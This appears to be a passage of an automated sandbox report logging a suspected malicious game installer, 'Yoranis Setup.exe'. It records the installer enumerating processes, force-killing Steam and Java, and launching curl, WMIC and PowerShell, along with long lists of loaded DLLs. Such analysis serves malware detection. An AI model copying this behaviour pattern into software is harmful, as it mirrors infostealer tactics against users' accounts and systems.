Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: version.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: sxs.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe -> Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\find.exe -> Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\find.exe -> Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dxil.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
